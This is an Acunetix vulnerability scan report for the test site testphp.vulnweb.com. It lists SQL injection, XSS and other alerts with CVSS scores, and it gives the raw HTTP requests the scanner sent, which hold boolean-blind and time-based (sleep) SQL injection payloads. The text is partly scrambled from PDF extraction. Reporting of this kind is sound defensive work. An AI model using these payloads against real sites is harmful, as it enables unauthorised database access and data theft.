Developer Report - E-SPIN Group · and/or deface your website. Alerts distribution ... -...

Acunetix Website Audit

13 December, 2016

Developer Report

Generated by Acunetix WVS Reporter (v10.5 Build 20160520)

Scan of http://testphp.vulnweb.com:80/

Scan information

Scan details

Start time 12/13/2016 6:36:48 PM

Finish time 12/13/2016 7:55:50 PM

Scan time 1 hours, 19 minutes

Profile Default

Server information

Responsive True

Server banner nginx/1.4.1

Server OS Unknown

Server technologies PHP

Threat level

Acunetix Threat Level 3

One or more high-severity type vulnerabilities have been discovered by the scanner. Amalicious user can exploit these vulnerabilities and compromise the backend databaseand/or deface your website.

Alerts distribution

High

Medium

Low

Informational 26

8

65

118

217Total alerts found

Knowledge base

Possible registration page

A page where is possible to register a new user account was found at /signup.php.

WordPress web application

WordPress web application was detected in directory /bxss/adminPan3l.

List of file extensions

File extensions can provide information on what technologies are being used on this website.List of file extensions detected: - css => 4 file(s)- gif => 1 file(s)- php => 50 file(s)- swf => 1 file(s)- fla => 1 file(s)- conf => 1 file(s)- htaccess => 1 file(s)- xml => 8 file(s)- htm => 1 file(s)- name => 1 file(s)- iml => 1 file(s)- sql => 1 file(s)- js => 1 file(s)- Log => 1 file(s)- bak => 2 file(s)

2Acunetix Website Audit

- tn => 8 file(s)- txt => 2 file(s)- html => 2 file(s)- LOG => 1 file(s)

List of client scripts

These files contain Javascript code referenced from the website. - /medias/js/common_functions.js

List of files with inputs

These files have at least one input (GET or POST). - / - 1 inputs- /userinfo.php - 4 inputs- /cart.php - 3 inputs- /search.php - 2 inputs- /hpp - 1 inputs- /hpp/params.php - 3 inputs- /hpp/index.php - 1 inputs- /artists.php - 1 inputs- /guestbook.php - 2 inputs- /AJAX/showxml.php - 1 inputs- /AJAX/infoartist.php - 1 inputs- /AJAX/infocateg.php - 1 inputs- /AJAX/infotitle.php - 1 inputs- /Mod_Rewrite_Shop/buy.php - 1 inputs- /Mod_Rewrite_Shop/details.php - 1 inputs- /Mod_Rewrite_Shop/rate.php - 1 inputs- /sendcommand.php - 2 inputs- /listproducts.php - 3 inputs- /product.php - 1 inputs- /showimage.php - 2 inputs- /redir.php - 1 inputs- /secured/newuser.php - 2 inputs- /secured/phpinfo.php - 1 inputs- /comment.php - 6 inputs- /_mmServerScripts/MMHTTPDB.php - 1 inputs- /bxss/vuln.php - 1 inputs

List of external hosts

These hosts were linked from this website but they were not scanned because they are not listed in the list of hostsallowed. (Configuration-> Scan Settings ->Scanning Options-> List of hosts allowed). - box.anchorfree.net- anchorfree.us- a433.com- pixel.quantserve.com- www.google.com- www.acunetix.com- www.eclectasy.com- download.macromedia.com- blog.mindedsecurity.com- hotspotshield.com- www.youtube.com- www.php.net- www.zend.com

Alerts summary


Blind SQL Injection

Classification

Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial

CVSS

Base Score: 10 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Changed- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: None

CVSS3

CWE CWE-89

Affected items Variations1/

1/AJAX/infoartist.php

1/AJAX/infocateg.php

1/AJAX/infotitle.php

2/artists.php

3/cart.php

1/guestbook.php

4/listproducts.php

1/Mod_Rewrite_Shop/buy.php

1/Mod_Rewrite_Shop/details.php

1/Mod_Rewrite_Shop/rate.php

2/product.php

5/search.php

1/secured/newuser.php

1/sendcommand.php

8/userinfo.php


Cross site scripting

Classification

Base Score: 6.4 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None

CVSS

Base Score: 5.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: Low- Availability Impact: None

CVSS3

CWE CWE-79

Affected items Variations2/showimage.php

Cross site scripting (verified)

Classification


CVSS


CVSS3

CWE CWE-79

Affected items Variations1/404.php

1/AJAX/showxml.php

1/comment.php

4/guestbook.php

1/hpp/

1/hpp/index.php

4/hpp/params.php

3/listproducts.php

2/search.php


10/userinfo.php


Directory traversal (verified)

Classification


CVSS

Base Score: 5.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: Low- Integrity Impact: None- Availability Impact: None

CVSS3

CWE CWE-22


Macromedia Dreamweaver remote database scripts

Classification

Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None

CVSS

CWE CWE-16

CVE CVE-2004-1893


nginx SPDY heap buffer overflow

Classification

Base Score: 5.1 - Access Vector: Network- Access Complexity: High- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial

CVSS

CWE CWE-122

CVE CVE-2014-0133

Affected items Variations1Web Server


PHP allow_url_fopen enabled

Classification

Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None

CVSS

CWE CWE-16


Script source code disclosure

Classification


CVSS

CWE CWE-538


Server side request forgery

Classification

Base Score: 5.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None

CVSS

Base Score: 9 - Attack Vector: Network- Attack Complexity: High- Privileges Required: None- User Interaction: None- Scope: Changed- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: High

CVSS3

CWE CWE-918



SQL injection

Classification


CVSS


CVSS3

CWE CWE-89


3/cart.php


SQL injection (verified)

Classification


CVSS


CVSS3

CWE CWE-89

Affected items Variations1/AJAX/infoartist.php



2/artists.php

1/guestbook.php

4/listproducts.php

1/Mod_Rewrite_Shop/buy.php

1/Mod_Rewrite_Shop/details.php

1/Mod_Rewrite_Shop/rate.php

2/product.php

5/search.php


2/sendcommand.php

13/userinfo.php

.htaccess file readable

Classification


CVSS

CWE CWE-16

Affected items Variations1/Mod_Rewrite_Shop


Application error message

Classification


CVSS

Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None

CVSS3

CWE CWE-200

Affected items Variations3/listproducts.php


2/showimage.php

10/userinfo.php

Backup files

Classification


CVSS

CWE CWE-538

Affected items Variations1/index.bak

1/index.zip


CRLF injection/HTTP response splitting (verified)

Classification

Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: Partial- Availability Impact: None

CVSS

Base Score: 5.4 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: Required- Scope: Unchanged- Confidentiality Impact: Low- Integrity Impact: Low- Availability Impact: None

CVSS3

CWE CWE-113

Affected items Variations1/redir.php

Cross domain data hijacking

Classification

Base Score: 4.4 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: None- Integrity Impact: Partial- Availability Impact: None

CVSS

CWE CWE-20

Affected items Variations2/hpp/params.php

Cross site scripting (content-sniffing)

Classification


CVSS


CVSS3

CWE CWE-79



Directory listing

Classification


CVSS


CVSS3

CWE CWE-538

Affected items Variations1/.idea

1/.idea/scopes

1/_mmServerScripts

1/admin

1/Connections

1/CVS

1/Flash

1/images

1/Mod_Rewrite_Shop/images

1/pictures

1/Templates

1/wvstests

1/wvstests/pmwiki_2_1_19

1/wvstests/pmwiki_2_1_19/scripts


Error message on page

Classification


CVSS


CVSS3

CWE CWE-200

Affected items Variations1/AJAX/infoartist.php



1/Connections/DB_Connection.php

1/pictures/path-disclosure-unix.html

1/secured/database_connect.php

HTML form without CSRF protection

Classification

Base Score: 2.6 - Access Vector: Network- Access Complexity: High- Authentication: None- Confidentiality Impact: None- Integrity Impact: Partial- Availability Impact: None

CVSS

Base Score: 4.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: Required- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: Low- Availability Impact: None

CVSS3

CWE CWE-352


1/comment.php (7aae61e4ef757b75f29861b71d32976e)

1/hpp (fbc1d56ba0737d3fa577aa5a19c9fd49)

1/signup.php

1/userinfo.php (9d1db3f4d16732c9716e14a3e959fa2d)


HTTP parameter pollution

Classification

Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: Partial- Availability Impact: None

CVSS

Base Score: 9.1 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: None

CVSS3

CWE CWE-88

Affected items Variations1/hpp/

1/hpp/index.php

Insecure crossdomain.xml file

Classification


CVSS

Base Score: 6.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: Low- Integrity Impact: Low- Availability Impact: None

CVSS3

CWE CWE-284



JetBrains .idea project directory

Classification


CVSS

CWE CWE-538



Classification


CVSS


CVSS3

CWE CWE-16

Affected items Variations1/secured/phpinfo.php

PHP errors enabled

Classification


CVSS

CWE CWE-16


1Web Server


PHP open_basedir is not set

Classification


CVSS


CVSS3

CWE CWE-16


PHP session.use_only_cookies disabled

Classification


CVSS

CWE CWE-16


PHPinfo page

Classification


CVSS


CVSS3

CWE CWE-200



PHPinfo page found

Classification


CVSS


CVSS3

CWE CWE-200


Source code disclosure

Classification


CVSS


CVSS3

CWE CWE-538

Affected items Variations1/index.bak

1/pictures/wp-config.bak


URL redirection

Classification


CVSS

Base Score: 0 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None

CVSS3

CWE CWE-601

Affected items Variations1/redir.php

User credentials are sent in clear text

Classification


CVSS

Base Score: 9.1 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: None

CVSS3

CWE CWE-310

Affected items Variations1/signup.php

WS_FTP log file found

Classification


CVSS

CWE CWE-538

Affected items Variations1/pictures//WS_FTP.LOG


Clickjacking: X-Frame-Options header missing

Classification


CVSS

CWE CWE-693


Cookie(s) without HttpOnly flag set

Classification


CVSS

CWE CWE-16


Hidden form input named price was found

Classification


CVSS

CWE CWE-16

Affected items Variations1/product.php (68db51598a6b1e726aa518e093bbd4ff)

MySQL username disclosure

Classification


CVSS

CWE CWE-538

Affected items Variations1/Connections/DB_Connection.php



Possible sensitive directories

Classification


CVSS


CVSS3

CWE CWE-200

Affected items Variations1/admin

1/CVS

1/secured

Broken links

Classification


CVSS

CWE CWE-16

Affected items Variations1/medias/css/main.css

1/medias/js/common_functions.js

1/Mod_Rewrite_Shop/Details/color-printer/3

1/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1

1/Mod_Rewrite_Shop/Details/web-camera-a4tech/2

1/privacy.php

1/secured/office_files/filelist.xml

1/Templates/logout.php


Email address found

Classification


CVSS


CVSS3

CWE CWE-200


GHDB: Default phpinfo page


GHDB: phpinfo()


GHDB: Sablotron error message

Affected items Variations1/pictures/path-disclosure-unix.html

GHDB: SQL error message




Microsoft Office possible sensitive information

Classification


CVSS


CVSS3

CWE CWE-200

Affected items Variations1/secured/office.htm

Password type input with auto-complete enabled

Classification


CVSS


CVSS3

CWE CWE-200

Affected items Variations2/login.php

Possible CSRF (Cross-site request forgery)

Affected items Variations1/AJAX/infotitle.php


Possible internal IP address disclosure

Classification


CVSS


CVSS3

CWE CWE-200

Affected items Variations1/404.php

1/pictures/ipaddresses.txt

1/secured/phpinfo.php

Possible server path disclosure (Unix)

Classification


CVSS


CVSS3

CWE CWE-200

Affected items Variations1/pictures/path-disclosure-unix.html

1/secured/phpinfo.php


Possible username or password disclosure

Classification


CVSS


CVSS3

CWE CWE-200


1/pictures/credentials.txt



Alert details

Blind SQL Injection

HighSeverity

ValidationType

Scripting (Blind_Sql_Injection.script)Reported by module

Description

This script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn'tproperly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it isrelatively easy to protect against, there is a large number of web applications vulnerable.

Impact

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of yourdatabase and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system accessfor the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shellcommands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database serverfunctions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

Recommendation

Your script should filter metacharacters from user input. Check detailed information for more information about fixing this vulnerability.

References

SQL Injection Walkthrough

VIDEO: SQL Injection tutorial

OWASP PHP Top 5

OWASP Injection Flaws

Acunetix SQL Injection Attack

How to check for SQL injection vulnerabilities

Affected items

/

Details

Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000hbBO'='000hbBO Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000hbBO'='000hbBO => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000hbBO'='000hbBO => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000hbBO'='000hbBO => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000hbBO'='000hbBO => TRUE- test%2Ftest' A ... (line truncated)

GET / HTTP/1.1

Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000hbBO'='000hbBO;

PHPSESSID=c3e1qcecc963h1hoij3o57aik0; OAID=X3285C893B9A5D126A7E0F8151CC99234;

mc=584fcf45-4aa21-c487e-27875;

NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe

08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3

Request headers


http://www.securiteam.com/securityreviews/5DP0N1P76E.html

http://www.acunetix.com/blog/web-security-zone/video-sql-injection-tutorial/

http://www.owasp.org/index.php/PHP_Top_5

http://www.owasp.org/index.php/Injection_Flaws

http://www.acunetix.com/websitesecurity/sql-injection.htm

http://www.acunetix.com/websitesecurity/sql-injection2/

X-Requested-With: XMLHttpRequest

Referer: http://testphp.vulnweb.com:80/

Host: testphp.vulnweb.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)

Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/AJAX/infoartist.php

Details

URL encoded GET input id was set to 3 AND 3*2*1=6 AND 573=573 Tests performed: - 1*1*1*3 => TRUE- 3*573*568*0 => FALSE- 13*5*2*999 => FALSE- 3*1*1 => TRUE- 1*1*1*1*1*3 => TRUE- 13*1*1*0*1*1*573 => FALSE- 3 AND 5*4=20 AND 573=573 => TRUE- 3 AND 5*4=21 AND 573=573 => FALSE... (line truncated)

GET /AJAX/infoartist.php?id=3%20AND%203*2*1=6%20AND%20573=573 HTTP/1.1



Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;

OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;







Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/AJAX/infocateg.php

Details


GET /AJAX/infocateg.php?id=3%20AND%203*2*1=6%20AND%20704=704 HTTP/1.1











Chrome/41.0.2228.0 Safari/537.21

Request headers


Accept: */*

/AJAX/infotitle.php

Details

URL encoded POST input id was set to 3 AND 3*2*1=6 AND 459=459 Tests performed: - 1*1*1*3 => TRUE- 3*459*454*0 => FALSE- 13*5*2*999 => FALSE- 3*1*1 => TRUE- 1*1*1*1*1*3 => TRUE- 13*1*1*0*1*1*459 => FALSE- 3 AND 5*4=20 AND 459=459 => TRUE- 3 AND 5*4=21 AND 459=459 => FALSE[/li ... (line truncated)

POST /AJAX/infotitle.php HTTP/1.1

Content-Length: 36

Content-Type: application/x-www-form-urlencoded











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

id=3%20AND%203*2*1=6%20AND%20459=459

Request headers

/artists.php

Details

URL encoded GET input artist was set to 3 AND 3*2*1=6 AND 473=473 Tests performed: - 1*1*1*3 => TRUE- 3*473*468*0 => FALSE- 13*5*2*999 => FALSE- 3*1*1 => TRUE- 1*1*1*1*1*3 => TRUE- 13*1*1*0*1*1*473 => FALSE- 3 AND 5*4=20 AND 473=473 => TRUE- 3 AND 5*4=21 AND 473=473 => FALSE[ ... (line truncated)

GET /artists.php?artist=3%20AND%203*2*1=6%20AND%20473=473 HTTP/1.1











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/artists.php


Details

Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000QXwt'='000QXwt Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000QXwt'='000QXwt => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000QXwt'='000QXwt => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000QXwt'='000QXwt => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000QXwt'='000QXwt => TRUE- test%2Ftest' A ... (line truncated)

GET /artists.php HTTP/1.1

Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000QXwt'='000QXwt;


mc=584fcf45-4aa21-c487e-27875;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/cart.php

Details

URL encoded POST input addcart was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ => 3.447s- (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0) ... (linetruncated)

POST /cart.php?del=2 HTTP/1.1

Content-Length: 130












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

addcart=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'"%

2b(select(0)from(select(sleep(0)))v)%2b"*/

Request headers

/cart.php

Details

URL encoded POST input addcart was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>4.555 s- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR" ...(line truncated)


POST /cart.php HTTP/1.1

Content-Length: 142












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

addcart=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'"

XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&price=800

Request headers

/cart.php

Details

Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000g1Fy'='000g1Fy Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000g1Fy'='000g1Fy => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000g1Fy'='000g1Fy => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000g1Fy'='000g1Fy => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000g1Fy'='000g1Fy => TRUE- test%2Ftest' A ... (line truncated)

GET /cart.php HTTP/1.1

Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000g1Fy'='000g1Fy;


mc=584fcf45-4aa21-c487e-27875;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/guestbook.php

Details

Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000W8lE'='000W8lE Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000W8lE'='000W8lE => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000W8lE'='000W8lE => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000W8lE'='000W8lE => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000W8lE'='000W8lE => TRUE- test%2Ftest' A ... (line truncated)

GET /guestbook.php HTTP/1.1

Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000W8lE'='000W8lE;


mc=584fcf45-4aa21-c487e-27875;





Request headers






Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/listproducts.php

Details

URL encoded GET input artist was set to -1 OR 3*2*1=6 AND 00053=00053 -- Tests performed: - -1 OR 2+53-53-1=0+0+0+1 -- => TRUE- -1 OR 3+53-53-1=0+0+0+1 -- => FALSE- -1 OR 3*2<(0+5+53-53) -- => FALSE- -1 OR 3*2>(0+5+53-53) -- => FALSE- -1 OR 2+1-1-1=1 AND 00053=00053 -- => TRUE- -1 OR 00053=00053 AND 3+1-1-1=1 -- => [bold ... (line truncated)

GET /listproducts.php?artist=-1%20OR%203*2*1=6%20AND%2000053=00053%20--%20 HTTP/1.1











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/listproducts.php

Details

URL encoded GET input cat was set to 1 AND 3*2*1=6 AND 46=46 Tests performed: - 1*1*1*1 => TRUE- 1*46*41*0 => FALSE- 11*5*2*999 => FALSE- 1*1*1 => TRUE- 1*1*1*1*1*1 => TRUE- 11*1*1*0*1*1*46 => FALSE- 1 AND 5*4=20 AND 46=46 => TRUE- 1 AND 5*4=21 AND 46=46 => FALSE- 1 AN ... (line truncated)

GET /listproducts.php?artist=1&cat=1%20AND%203*2*1=6%20AND%2046=46 HTTP/1.1











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/listproducts.php


Details

URL encoded GET input cat was set to -1 OR 3*2*1=6 AND 000291=000291 -- Tests performed: - -1 OR 2+291-291-1=0+0+0+1 -- => TRUE- -1 OR 3+291-291-1=0+0+0+1 -- => FALSE- -1 OR 3*2<(0+5+291-291) -- => FALSE- -1 OR 3*2>(0+5+291-291) -- => FALSE- -1 OR 2+1-1-1=1 AND 000291=000291 -- => TRUE- -1 OR 000291=000291 AND 3+1-1-1=1 - ... (line truncated)

GET /listproducts.php?cat=-1%20OR%203*2*1=6%20AND%20000291=000291%20--%20 HTTP/1.1











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/listproducts.php

Details

Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000Si5V'='000Si5V Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000Si5V'='000Si5V => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000Si5V'='000Si5V => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000Si5V'='000Si5V => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000Si5V'='000Si5V => TRUE- test%2Ftest' A ... (line truncated)

GET /listproducts.php HTTP/1.1

Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000Si5V'='000Si5V;


mc=584fcf45-4aa21-c487e-27875;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Mod_Rewrite_Shop/buy.php

Details



GET /Mod_Rewrite_Shop/buy.php?id=1%20AND%203*2*1=6%20AND%20736=736 HTTP/1.1











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Mod_Rewrite_Shop/details.php

Details


GET /Mod_Rewrite_Shop/details.php?id=1%20AND%203*2*1=6%20AND%20655=655 HTTP/1.1











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/Mod_Rewrite_Shop/rate.php

Details


GET /Mod_Rewrite_Shop/rate.php?id=1%20AND%203*2*1=6%20AND%20259=259 HTTP/1.1





NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZP

Request headers


e08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3





Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/product.php

Details

Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000Yusl'='000Yusl Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000Yusl'='000Yusl => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000Yusl'='000Yusl => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000Yusl'='000Yusl => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000Yusl'='000Yusl => TRUE- test%2Ftest' A ... (line truncated)

GET /product.php HTTP/1.1

Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000Yusl'='000Yusl;


mc=584fcf45-4aa21-c487e-27875;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/product.php

Details

URL encoded GET input pic was set to 4 AND 3*2*1=6 AND 751=751 Tests performed: - 1*1*1*4 => TRUE- 4*751*746*0 => FALSE- 14*5*2*999 => FALSE- 4*1*1 => TRUE- 1*1*1*1*1*4 => TRUE- 14*1*1*0*1*1*751 => FALSE- 4 AND 5*4=20 AND 751=751 => TRUE- 4 AND 5*4=21 AND 751=751 => FALSE[/li ... (line truncated)

GET /product.php?pic=4%20AND%203*2*1=6%20AND%20751=751 HTTP/1.1











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/search.php


Details

Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000EGt5'='000EGt5 Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000EGt5'='000EGt5 => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000EGt5'='000EGt5 => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000EGt5'='000EGt5 => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000EGt5'='000EGt5 => TRUE- test%2Ftest' A ... (line truncated)

GET /search.php HTTP/1.1

Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000EGt5'='000EGt5;


mc=584fcf45-4aa21-c487e-27875;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/search.php

Details

URL encoded POST input searchFor was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>3.448 s- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))O ... (linetruncated)

POST /search.php?test=query HTTP/1.1

Content-Length: 146












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

goButton=go&searchFor=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2cslee

p(0)%2c0))OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/

Request headers

/search.php

Details

URL encoded POST input searchFor was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>3.557 s- if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))O ... (linetruncated)


POST /search.php?test=1 HTTP/1.1

Content-Length: 134












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

searchFor=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR

'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/

Request headers

/search.php

Details

URL encoded GET input test was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ => 9.547s- (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v) ... (linetruncated)

POST

/search.php?test=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0))

)v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/ HTTP/1.1

Content-Length: 22












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

goButton=go&searchFor=

Request headers

/search.php

Details

URL encoded GET input test was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 6.458s- (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v) ... (linetruncated)

POST

/search.php?test=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0))

)v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/ HTTP/1.1

Request headers


Content-Length: 11












